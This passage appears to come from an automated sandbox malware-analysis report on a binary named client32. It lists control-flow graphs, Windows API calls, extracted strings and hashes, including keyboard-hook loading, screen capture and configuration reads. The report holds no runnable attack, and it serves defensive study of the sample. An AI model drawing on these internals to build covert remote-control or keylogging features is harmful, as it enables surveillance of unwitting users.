1102e962-1102e96a 2270->2293 2294 1102e93c-1102e942 2270->2294 2279 1102e3ab-1102e3b2 call 11028360 2272->2279 2280 1102e409 2272->2280 2273->2200 2285 1102e70b-1102e70d 2277->2285 2283 1102e702-1102e704 2278->2283 2284 1102e6f0-1102e6f6 2278->2284 2279->2280 2300 1102e3b4-1102e3e6 2279->2300 2280->2200 2283->2285 2284->2277 2291 1102e6f8-1102e700 2284->2291 2285->2264 2285->2290 2298 1102e735-1102e74a call 110b7df0 call 1102a1f0 2290->2298 2299 1102e74c-1102e75f call 11081d30 2290->2299 2291->2269 2291->2283 2296 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2293->2296 2297 1102e96c-1102e979 call 11036710 call 11162777 2293->2297 2294->2293 2301 1102e944-1102e95d call 1102d900 2294->2301 2297->2296 2331 1102e7a3-1102e7bc call 11081d30 2298->2331 2314 1102e761-1102e784 2299->2314 2315 1102e786-1102e788 2299->2315 2317 1102e3f0-1102e3ff call 110f64d0 2300->2317 2318 1102e3e8-1102e3ee 2300->2318 2301->2293 2314->2331 2327 1102e790-1102e7a1 2315->2327 2323 1102e402-1102e404 call 1102d900 2317->2323 2318->2317 2318->2323 2323->2280 2333 1102e613-1102e61f 2325->2333 2326->2333 2343 1102e5a5-1102e5ae 2326->2343 2327->2327 2327->2331 2352 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2331->2352 2353 1102e8fc-1102e909 _strncpy 2331->2353 2337 1102e662-1102e671 2333->2337 2338 1102e621-1102e62d 2333->2338 2337->2253 2347 1102e673-1102e674 FreeLibrary 2337->2347 2345 1102e63f-1102e643 2338->2345 2346 1102e62f-1102e63d GetProcAddress 2338->2346 2343->2333 2351 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2343->2351 2349 1102e654-1102e656 SetLastError 2345->2349 2350 1102e645-1102e648 2345->2350 2346->2345 2347->2253 2355 1102e65c 2349->2355 2350->2355 2351->2333 2370 1102e5e8-1102e60e call 11147060 call 11027f80 2351->2370 2384 1102e853-1102e869 call 11129e00 2352->2384 2385 1102e83f-1102e84e call 11029a70 2352->2385 2358 1102e90c-1102e911 CharUpperA 2353->2358 2355->2337 2358->2270 2370->2333 2389 1102e882-1102e8bc call 110d0e20 * 2 2384->2389 2390 1102e86b-1102e87d call 110d0e20 2384->2390 2385->2384 2397 1102e8d2-1102e8fa _strncpy call 110d0a10 2389->2397 2398 1102e8be-1102e8cd call 11029a70 2389->2398 2390->2389 2397->2358 2398->2397
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 1102E501
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: $18/11/16 11:28:14 V12.10F20$506013$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 1029625771-3322342010
                                                                                        • Opcode ID: e925681e9f8466b56a3c9042d396dde717226b4199e7b2c94d0e0abd4c9137a1
                                                                                        • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                        • Opcode Fuzzy Hash: e925681e9f8466b56a3c9042d396dde717226b4199e7b2c94d0e0abd4c9137a1
                                                                                        • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2402 11142010-11142051 call 11147060 2405 11142057-111420b3 LoadLibraryA 2402->2405 2406 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2402->2406 2408 111420b5 call 11017a40 2405->2408 2409 111420c7-111420d0 2405->2409 2418 11142105-1114210b 2406->2418 2419 11142133 2406->2419 2414 111420ba-111420c0 2408->2414 2409->2406 2410 111420d2-111420d3 FreeLibrary 2409->2410 2410->2406 2414->2409 2416 111420c2 call 110ccc90 2414->2416 2416->2409 2418->2419 2420 1114210d-11142113 2418->2420 2421 1114213d-1114215d GetClassInfoExA 2419->2421 2420->2419 2422 11142115-11142131 call 1105e820 2420->2422 2423 11142163-1114218a call 11162be0 call 11145080 2421->2423 2424 111421fe-11142256 2421->2424 2422->2421 2433 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2423->2433 2434 1114218c-111421a0 call 11029a70 2423->2434 2435 11142292-11142298 2424->2435 2436 11142258-1114225e 2424->2436 2433->2424 2461 111421e7-111421fb call 11029a70 2433->2461 2434->2433 2440 111422d4-111422f6 call 1105e820 2435->2440 2441 1114229a-111422a9 call 111101b0 2435->2441 2436->2435 2438 11142260-11142266 2436->2438 2438->2435 2444 11142268-1114227f call 1112d770 LoadLibraryA 2438->2444 2451 11142304-11142309 2440->2451 2452 111422f8-11142302 2440->2452 2455 111422cd 2441->2455 2456 111422ab-111422cb 2441->2456 2444->2435 2460 11142281-1114228d GetProcAddress 2444->2460 2458 11142315-1114231b 2451->2458 2459 1114230b 2451->2459 2452->2458 2457 111422cf 2455->2457 2456->2457 2457->2440 2462 1114231d-11142323 call 110f8230 2458->2462 2463 11142328-11142341 call 1113d9a0 2458->2463 2459->2458 2460->2435 2461->2424 2462->2463 2470 11142347-1114234d 2463->2470 2471 111423e9-111423fa 2463->2471 2472 1114234f-11142361 call 111101b0 2470->2472 2473 11142389-1114238f 2470->2473 2482 11142363-11142379 call 1115e590 2472->2482 2483 1114237b 2472->2483 2475 111423b5-111423c1 2473->2475 2476 11142391-11142397 2473->2476 2480 111423c3-111423c9 2475->2480 2481 111423d8-111423e3 #17 LoadLibraryA 2475->2481 2478 1114239e-111423b0 SetTimer 2476->2478 2479 11142399 call 11135840 2476->2479 2478->2475 2479->2478 2480->2481 2485 111423cb-111423d1 2480->2485 2481->2471 2488 1114237d-11142384 2482->2488 2483->2488 2485->2481 2486 111423d3 call 1112e5e0 2485->2486 2486->2481 2488->2473
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 11142063
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                        • LoadLibraryA.KERNEL32(imm32), ref: 111420F6
                                                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                        • _memset.LIBCMT ref: 11142169
                                                                                        • LoadCursorA.USER32(00000000,00007F00,?,?,?,?,?,00000000,?), ref: 111421B9
                                                                                        • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                        • RegisterClassExA.USER32 ref: 111421DA
                                                                                        • LoadLibraryA.KERNEL32(pcihooks), ref: 11142272
                                                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard,?,?,00000000,?), ref: 11142287
                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                        • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                        • LoadLibraryA.KERNEL32(riched32.dll), ref: 111423E3
                                                                                          • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,B24479DC,11030346,00000000), ref: 11017A6E
                                                                                          • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                          • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                          • Part of subcall function 11017A40: QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
                                                                                          • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                          • Part of subcall function 110CCC90: CreateWindowExA.USER32 ref: 110CCCC9
                                                                                          • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoItemLongObjectQueueRegisterStockTimerUserWindowWork_memset
                                                                                        • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                        • API String ID: 3910702804-3145203681
                                                                                        • Opcode ID: 0c6cc3169c40bacbb2bf29f65020cbaace3c13be9d4fbd3d6ea0bb359ad99c5d
                                                                                        • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                        • Opcode Fuzzy Hash: 0c6cc3169c40bacbb2bf29f65020cbaace3c13be9d4fbd3d6ea0bb359ad99c5d
                                                                                        • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2491 11028c10-11028c2d 2492 11028c33-11028c62 2491->2492 2493 110292f8-110292ff 2491->2493 2494 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2492->2494 2495 11028c68-11028c6e 2492->2495 2496 11029311-11029315 2493->2496 2497 11029301-1102930a 2493->2497 2511 11028d3d 2494->2511 2501 11028c70-11028c78 2495->2501 2498 11029317-11029329 call 11162bb7 2496->2498 2499 1102932a-1102933e call 11162bb7 2496->2499 2497->2496 2502 1102930c 2497->2502 2501->2501 2506 11028c7a-11028c80 2501->2506 2502->2496 2510 11028c83-11028c88 2506->2510 2510->2510 2512 11028c8a-11028c94 2510->2512 2513 11028d40-11028d4a 2511->2513 2514 11028cb1-11028cb7 2512->2514 2515 11028c96-11028c9d 2512->2515 2518 11028d50-11028d53 2513->2518 2519 110292ef-110292f7 2513->2519 2517 11028cb8-11028cbe 2514->2517 2516 11028ca0-11028ca6 2515->2516 2516->2516 2520 11028ca8-11028cae 2516->2520 2517->2517 2521 11028cc0-11028cee call 11164ead 2517->2521 2518->2519 2522 11028d59-11028d67 call 11026ef0 2518->2522 2519->2493 2520->2514 2521->2513 2527 11029275-1102928a call 11164c77 2522->2527 2528 11028d6d-11028d80 call 11163ca7 2522->2528 2527->2519 2535 11029290-110292ea 2527->2535 2533 11028d82-11028d85 2528->2533 2534 11028d8b-11028db3 call 11026d60 call 11026ef0 2528->2534 2533->2527 2533->2534 2534->2527 2540 11028db9-11028dd6 call 11026fe0 call 11026ef0 2534->2540 2535->2519 2545 110291e5-110291ec 2540->2545 2546 11028ddc 2540->2546 2548 11029212-11029219 2545->2548 2549 110291ee-110291f1 2545->2549 2547 11028de0-11028e00 call 11026d60 2546->2547 2559 11028e02-11028e05 2547->2559 2560 11028e36-11028e39 2547->2560 2552 11029231-11029238 2548->2552 2553 1102921b-11029221 2548->2553 2549->2548 2551 110291f3-110291fa 2549->2551 2558 11029200-11029210 2551->2558 2556 1102923a-11029245 2552->2556 2557 11029248-1102924f 2552->2557 2554 11029227-1102922f 2553->2554 2554->2552 2554->2554 2556->2557 2561 11029251-1102925b 2557->2561 2562 1102925e-11029265 2557->2562 2558->2548 2558->2558 2563 11028e07-11028e0e 2559->2563 2564 11028e1e-11028e21 2559->2564 2566 110291ce-110291df call 11026ef0 2560->2566 2567 11028e3f-11028e52 call 11165010 2560->2567 2561->2562 2562->2527 2565 11029267-11029272 2562->2565 2568 11028e14-11028e1c 2563->2568 2564->2566 2569 11028e27-11028e31 2564->2569 2565->2527 2566->2545 2566->2547 2567->2566 2574 11028e58-11028e74 call 1116558e 2567->2574 2568->2564 2568->2568 2569->2566 2577 11028e76-11028e7c 2574->2577 2578 11028e8f-11028ea5 call 1116558e 2574->2578 2579 11028e80-11028e88 2577->2579 2583 11028ea7-11028ead 2578->2583 2584 11028ebf-11028ed5 call 1116558e 2578->2584 2579->2579 2581 11028e8a 2579->2581 2581->2566 2585 11028eb0-11028eb8 2583->2585 2589 11028ed7-11028edd 2584->2589 2590 11028eef-11028f05 call 1116558e 2584->2590 2585->2585 2587 11028eba 2585->2587 2587->2566 2591 11028ee0-11028ee8 2589->2591 2595 11028f07-11028f0d 2590->2595 2596 11028f1f-11028f35 call 1116558e 2590->2596 2591->2591 2594 11028eea 2591->2594 2594->2566 2597 11028f10-11028f18 2595->2597 2601 11028f37-11028f3d 2596->2601 2602 11028f4f-11028f65 call 1116558e 2596->2602 2597->2597 2599 11028f1a 2597->2599 2599->2566 2603 11028f40-11028f48 2601->2603 2607 11028f67-11028f6d 2602->2607 2608 11028f7f-11028f95 call 1116558e 2602->2608 2603->2603 2605 11028f4a 2603->2605 2605->2566 2610 11028f70-11028f78 2607->2610 2613 11028f97-11028f9d 2608->2613 2614 11028faf-11028fc5 call 1116558e 2608->2614 2610->2610 2612 11028f7a 2610->2612 2612->2566 2615 11028fa0-11028fa8 2613->2615 2619 11028fc7-11028fcd 2614->2619 2620 11028fdf-11028ff5 call 1116558e 2614->2620 2615->2615 2617 11028faa 2615->2617 2617->2566 2621 11028fd0-11028fd8 2619->2621 2625 11028ff7-11028ffd 2620->2625 2626 1102900f-11029025 call 1116558e 2620->2626 2621->2621 2623 11028fda 2621->2623 2623->2566 2627 11029000-11029008 2625->2627 2631 11029027-1102902d 2626->2631 2632 1102903f-11029055 call 1116558e 2626->2632 2627->2627 2629 1102900a 2627->2629 2629->2566 2633 11029030-11029038 2631->2633 2637 11029057-1102905d 2632->2637 2638 1102906f-11029085 call 1116558e 2632->2638 2633->2633 2635 1102903a 2633->2635 2635->2566 2639 11029060-11029068 2637->2639 2643 110290a6-110290bc call 1116558e 2638->2643 2644 11029087-1102908d 2638->2644 2639->2639 2642 1102906a 2639->2642 2642->2566 2649 110290d3-110290e9 call 1116558e 2643->2649 2650 110290be 2643->2650 2645 11029097-1102909f 2644->2645 2645->2645 2647 110290a1 2645->2647 2647->2566 2655 11029100-11029116 call 1116558e 2649->2655 2656 110290eb 2649->2656 2651 110290c4-110290cc 2650->2651 2651->2651 2653 110290ce 2651->2653 2653->2566 2661 11029137-1102914d call 1116558e 2655->2661 2662 11029118-1102911e 2655->2662 2658 110290f1-110290f9 2656->2658 2658->2658 2660 110290fb 2658->2660 2660->2566 2667 1102916f-11029185 call 1116558e 2661->2667 2668 1102914f-1102915f 2661->2668 2663 11029128-11029130 2662->2663 2663->2663 2665 11029132 2663->2665 2665->2566 2673 11029187-1102918d 2667->2673 2674 1102919c-110291b2 call 1116558e 2667->2674 2669 11029160-11029168 2668->2669 2669->2669 2671 1102916a 2669->2671 2671->2566 2675 11029190-11029198 2673->2675 2674->2566 2679 110291b4-110291ba 2674->2679 2675->2675 2677 1102919a 2675->2677 2677->2566 2680 110291c4-110291cc 2679->2680 2680->2566 2680->2680
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73631528,?,0000001A), ref: 11028CFD
                                                                                        • _strrchr.LIBCMT ref: 11028D0C
                                                                                          • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                        • API String ID: 1609618855-357498123
                                                                                        • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                        • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                        • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                        • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2681 11030ef3-11030f1a RegOpenKeyExA 2682 11030f20-11030f4f call 11143bd0 2681->2682 2683 1103103d-1103105b 2681->2683 2689 11031030-11031037 RegCloseKey 2682->2689 2690 11030f55-11030f72 call 11163ca7 call 111648ed 2682->2690 2687 11031061-1103107b 2683->2687 2688 11031135-1103113f 2683->2688 2691 11031081-110312d6 call 111101b0 call 11109bc0 2687->2691 2688->2691 2692 11031145-11031168 call 111101b0 call 110fae60 2688->2692 2689->2683 2706 11030f86-11030f89 2690->2706 2707 11030f74-11030f84 call 111648ed 2690->2707 2714 110312db-1103131f GetStockObject GetObjectA 2691->2714 2692->2714 2711 11030f8b 2706->2711 2712 11030f8c-11030f98 call 11163ca7 2706->2712 2707->2706 2711->2712 2712->2689 2722 11030f9e-11030faa 2712->2722 2718 11031321 2714->2718 2719 1103132b-11031497 SetErrorMode * 2 call 111101b0 call 11028980 call 111101b0 call 11028980 InterlockedExchange call 111101b0 call 1108a880 GetACP call 11163f93 call 111663a3 call 11143770 call 11143780 call 111101b0 call 11061aa0 2714->2719 2718->2719 2762 11031499 2719->2762 2763 1103149f-110314a5 2719->2763 2722->2689 2723 11030fb0-11030fb3 2722->2723 2723->2689 2725 11030fb5-1103101c call 11143bd0 * 2 2723->2725 2725->2689 2735 1103101e-1103102a 2725->2735 2735->2689 2762->2763 2764 110314e1-110315f6 call 110ccc90 call 111101b0 call 11125d40 call 11114fb0 call 111101b0 call 11088b30 call 111101b0 call 1105cdb0 call 11110270 call 1105d1a0 call 11027810 call 1100d620 2763->2764 2765 110314a7-110314dc call 111101b0 call 11061710 2763->2765 2806 11031749-11031776 call 110edb10 call 11162bb7 2764->2806 2807 110315fc-11031610 call 1100d330 call 11147060 2764->2807 2765->2764 2807->2806
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32 ref: 11030F12
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11031037
                                                                                          • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                        • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                        • InterlockedExchange.KERNEL32(00348A70,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                          • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                        • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                        • API String ID: 1620732580-3468083601
                                                                                        • Opcode ID: ed52c86302eb7f901d25fe393c1b878ef6ae758d34793e3430cbb3b188471344
                                                                                        • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                        • Opcode Fuzzy Hash: ed52c86302eb7f901d25fe393c1b878ef6ae758d34793e3430cbb3b188471344
                                                                                        • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2816 110869d0-110869ed call 110869c0 2819 110869ef-110869ff call 11162bb7 2816->2819 2820 11086a00-11086a10 call 111457a0 2816->2820 2825 11086a12-11086a1a 2820->2825 2825->2825 2826 11086a1c-11086a22 2825->2826 2827 11086a23-11086a29 2826->2827 2827->2827 2828 11086a2b-11086a62 LoadLibraryA 2827->2828 2829 11086ac9-11086ade GetProcAddress 2828->2829 2830 11086a64-11086a6b 2828->2830 2833 11086b6c-11086b7d call 11162bb7 2829->2833 2834 11086ae4-11086af3 GetProcAddress 2829->2834 2831 11086a6d-11086abe GetModuleFileNameA call 11081e00 LoadLibraryA 2830->2831 2832 11086ac0-11086ac3 2830->2832 2831->2832 2832->2829 2832->2833 2834->2833 2836 11086af5-11086b04 GetProcAddress 2834->2836 2836->2833 2840 11086b06-11086b15 GetProcAddress 2836->2840 2840->2833 2841 11086b17-11086b26 GetProcAddress 2840->2841 2841->2833 2842 11086b28-11086b37 GetProcAddress 2841->2842 2842->2833 2843 11086b39-11086b48 GetProcAddress 2842->2843 2843->2833 2844 11086b4a-11086b59 GetProcAddress 2843->2844 2844->2833 2845 11086b5b-11086b6a GetProcAddress 2844->2845 2845->2833 2846 11086b7e-11086b93 call 11162bb7 2845->2846
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11086A5C
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AEC
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086AFD
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B0E
                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B1F
                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks,?,CipherServer_CloseSession,?,CipherServer_OpenSession,?,CipherServer_Destroy,?,CipherServer_Create), ref: 11086B30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
